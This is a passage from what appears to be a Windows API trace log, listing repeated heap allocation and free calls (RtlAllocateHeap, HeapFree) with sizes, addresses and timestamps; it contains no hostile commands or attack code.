RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf38 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2e80f0 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf38 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8208 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8318 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8318 | out: hHeap=0x2b0000) returned 1 [0032.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0032.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0032.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eac08 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eae28 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf30 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2e80f0 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8200 [0032.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf30 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e95b0 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8310 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 